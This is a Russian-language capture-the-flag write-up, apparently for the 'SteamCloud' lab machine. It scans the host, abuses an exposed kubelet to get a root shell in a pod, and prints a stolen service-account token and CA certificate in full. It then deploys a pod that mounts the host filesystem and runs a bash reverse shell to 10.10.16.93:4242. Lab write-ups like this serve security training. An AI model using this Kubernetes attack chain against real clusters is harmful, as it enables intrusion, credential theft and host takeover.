Обзор сервисов
IP-адрес машины 10.10.11.133. Проверим вывод nmap:
$ sudo nmap -sS -Pn -p1-65535 -vvv -oN 10.10.11.133 10.10.11.133
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 13:59 EDT
Initiating Parallel DNS resolution of 1 host. at 13:59
Completed Parallel DNS resolution of 1 host. at 13:59, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:59
Scanning 10.10.11.133 [65535 ports]
Discovered open port 22/tcp on 10.10.11.133
Discovered open port 80/tcp on 10.10.11.133
Discovered open port 10250/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 10.42% done; ETC: 14:04 (0:04:26 remaining)
SYN Stealth Scan Timing: About 16.56% done; ETC: 14:05 (0:05:07 remaining)
Discovered open port 8443/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 24.58% done; ETC: 14:05 (0:04:39 remaining)
Discovered open port 10249/tcp on 10.10.11.133
Discovered open port 2380/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 31.98% done; ETC: 14:05 (0:04:17 remaining)
Stats: 0:05:47 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.55% done; ETC: 14:08 (0:04:06 remaining)
SYN Stealth Scan Timing: About 65.36% done; ETC: 14:09 (0:03:36 remaining)
SYN Stealth Scan Timing: About 71.92% done; ETC: 14:09 (0:03:03 remaining)
SYN Stealth Scan Timing: About 77.81% done; ETC: 14:10 (0:02:30 remaining)
Discovered open port 10256/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 83.20% done; ETC: 14:10 (0:01:55 remaining)
SYN Stealth Scan Timing: About 89.44% done; ETC: 14:10 (0:01:11 remaining)
Discovered open port 2379/tcp on 10.10.11.133
SYN Stealth Scan Timing: About 94.73% done; ETC: 14:10 (0:00:36 remaining)
Completed SYN Stealth Scan at 14:11, 719.50s elapsed (65535 total ports)
Nmap scan report for 10.10.11.133
Host is up, received user-set (0.17s latency).
Scanned at 2023-07-27 13:59:06 EDT for 719s
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
2379/tcp open etcd-client syn-ack ttl 63
2380/tcp open etcd-server syn-ack ttl 63
8443/tcp open https-alt syn-ack ttl 63
10249/tcp open unknown syn-ack ttl 63
10250/tcp open unknown syn-ack ttl 63
10256/tcp open unknown syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 719.79 seconds
Raw packets sent: 68943 (3.033MB) | Rcvd: 106227 (11.882MB)
Веб-сервер
На веб-сервере нас встречает стандартная страница nginx.
На порту 8443 висит kubernetes (minikube).
Minikube
Продолжим исследовать minikube.
$ curl -k https://10.10.11.133:8443/healthz
ok
На порту 10250 доступна информация о подах:
Установим kubeletctl:
wget https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64 && mv kubeletctl* kubeletctl && chmod +x kubeletctl
Посмотрим поды внимательнее:
$ ./kubeletctl pods -s 10.10.11.133
┌────────────────────────────────────────────────────────────────────────────────┐
│ Pods from Kubelet │
├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤
│ │ POD │ NAMESPACE │ CONTAINERS │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 1 │ etcd-steamcloud │ kube-system │ etcd │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 2 │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 3 │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 4 │ coredns-78fcd69978-rksk2 │ kube-system │ coredns │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 5 │ nginx │ default │ nginx │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 6 │ spark-pod │ default │ spark-pod │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 7 │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 8 │ storage-provisioner │ kube-system │ storage-provisioner │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 9 │ kube-proxy-wfzq2 │ kube-system │ kube-proxy │
│ │ │ │ │
└───┴────────────────────────────────────┴─────────────┴─────────────────────────┘
Под nginx не в неймспейсе kube-system, попробуем выполнять в нем команды:
$ ./kubeletctl exec "id" -p nginx -c nginx -s 10.10.11.133
uid=0(root) gid=0(root) groups=0(root)
Интерактивный шелл:
$ ./kubeletctl exec "/bin/bash" -p nginx -c nginx -s 10.10.11.133
root@nginx:/#
Пользовательский флаг
root@nginx:/# cd /root
lcd /root
root@nginx:~# s -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Nov 30 2021 .
drwxr-xr-x 1 root root 4096 Jul 27 06:26 ..
-rw-r--r-- 2 root root 33 Jul 27 06:25 user.txt
root@nginx:~# cat user.txt
cat user.txt
d57a2b97970cab038789e36c97b5a7f7
Токен и сертификат
Мы обнаружили токен и сертификат в поде.
$ find / -name *token*
find: '/proc/8/map_files': Permission denied
/run/secrets/kubernetes.io/serviceaccount/._07_27_18_35_11.210512991/token
/run/secrets/kubernetes.io/serviceaccount/token
$ cd /run/secrets/kubernetes.io/serviceaccount
$ ls -la
total 4
drwxrwxrwt 3 root root 140 Jul 27 18:35 .
drwxr-xr-x 3 root root 4096 Jul 27 06:26 ..
drwxr-xr-x 2 root root 100 Jul 27 18:35 ._07_27_18_35_11.210512991
lrwxrwxrwx 1 root root 31 Jul 27 18:35 ..data -> ._07_27_18_35_11.210512991
lrwxrwxrwx 1 root root 13 Jul 27 06:26 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Jul 27 06:26 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Jul 27 06:26 token -> ..data/token
$ cat ca.crt
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----
$ cat token
eyJhbGciOiJSUzI1NiIsImtpZCI6IjFVVEhtRUE0NjloTHMyWHNGU1VBTXFHdHhBYTlCS3FtallwTFA0YXllR0EifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzIyMDE4OTExLCJpYXQiOjE2OTA0ODI5MTEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjQ2YWJiZGJhLTIzM2MtNDliZS1iYTZmLTA2ZjNjMTUzZjZjZSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6ImFmYWNkOWFkLWZiOTItNDk5MS1iNGQ0LTgyY2VmZmU0YjBkNSJ9LCJ3YXJuYWZ0ZXIiOjE2OTA0ODY1MTh9LCJuYmYiOjE2OTA0ODI5MTEsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.BI_pOgj5gjsNTHtbytvNUf_KK0z4d4UcwW64K-f4fslWaQNcWz5Q15dbjbcvnSS4wM6M1aOnWGFZfGjEM8btKJP3-bN3Ued2kXE638xiRYnnAm0yaJ5o8J7S2Vk6N5-7gwRGFfrx_VJAR3KgVMU4lqK9GtJ0hPo0tFJWBJF97zNnR_XBppN8R4hx8qELHiwkYSMyyDjaR4T2r34G4c3k1NR0PoU4cxg2o0jnOX2lUmWpH1vIAUHg-zOM5idZjMNBn_2wBTRNNSDquGWySyxocvcNSRlJTjF7TF4ptv7OC2cF3d974MHD1_LhQ2bSPRpiZOWsU39IFHOslsMaWoO1Fg
Запишем сертификат в файл ca.crt, а токен в переменную TOKEN, после чего можем выполнить:
$ kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$TOKEN get pod
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 12h
spark-pod 1/1 Running 0 12h
Список возможных действий с этим набором кредов следующий:
$ kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$TOKEN
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get create list]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Посмотрим информацию о контейнере пода nginx:
$ kubectl get pod nginx -o yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$TOKEN
apiVersion: v1
kind: Pod
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"nginx","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","imagePullPolicy":"Never","name":"nginx","volumeMounts":[{"mountPath":"/root","name":"flag"}]}],"volumes":[{"hostPath":{"path":"/opt/flag"},"name":"flag"}]}}
creationTimestamp: "2023-07-27T06:26:02Z"
name: nginx
namespace: default
resourceVersion: "494"
uid: 46abbdba-233c-49be-ba6f-06f3c153f6ce
spec:
containers:
- image: nginx:1.14.2
- namespace:
default - image:
nginx:1.14.2
Попытаемся получить реверс-шелл через раскатку своего пода и монтирование хостовой файловой системы:
$ nano rev.yaml
apiVersion: v1
kind: Pod
metadata:
name: rev
namespace: default
spec:
containers:
- name: rev
image: nginx:1.14.2
command: ["/bin/bash"]
args: ["-c", "/bin/bash -i >& /dev/tcp/10.10.16.93/4242 0>&1"]
volumeMounts:
- mountPath: /mnt
name: hostfs
volumes:
- name: hostfs
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: true
$ rlwarp nc -lnvp 4242
# в другом терминале раскатим под
$ kubectl apply -f rev.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$TOKEN
pod/rev created
Флаг суперпользователя
root@steamcloud:~$ cd /mnt/root
root@steamcloud:/mnt/root$ ls -la
total 28
drwx------ 4 root root 4096 Jan 10 2022 .
drwxr-xr-x 18 root root 4096 Dec 1 2021 ..
lrwxrwxrwx 1 root root 9 Nov 30 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-x--- 3 root root 4096 Nov 30 2021 .kube
drwxr-xr-x 10 root root 4096 Nov 30 2021 .minikube
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Jul 27 06:25 root.txt
root@steamcloud:/mnt/root$ id
uid=0(root) gid=0(root) groups=0(root)
root@steamcloud:/mnt/root$ cat root.txt
88198981631135b8052adf47c90bf589
